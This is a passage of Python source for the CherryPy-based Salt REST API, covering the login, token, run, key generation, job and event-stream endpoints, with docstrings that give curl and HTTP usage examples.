and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
[{"tgt": "*", "fun": "status.diskusage"}]
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result", {})
for minion in returns:
# Each minion's entry holds the job data; pull out its 'return' value
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>` function.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
perms = salt.netapi.sum_permissions(token, eauth)
perms = salt.netapi.sorted_permissions(perms)
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for eauth %r, and user %r.",
token.get("eauth"),
token.get("name"),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
salt-api does not enforce authorization; Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token:
# We want to at least make sure that the token isn't expired yet.
resolved_tkn = self.resolver.get_token(salt_token)
if resolved_tkn and resolved_tkn.get("expire", 0) > time.time():
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE-compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to watch only for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream *before* creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious about writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n"
while True:
# make sure the token is still valid
if not self._is_valid_token(auth_token):
logger.debug("Token is no longer valid")
break
data = next(stream)
yield "tag: {}\n".format(data.get("tag", ""))
yield "data: {}\n\n".format(salt.utils.json.dumps(data))
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print(ws.recv())
ws.close()
The above examples show how to establish a websocket connection to Salt and
activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
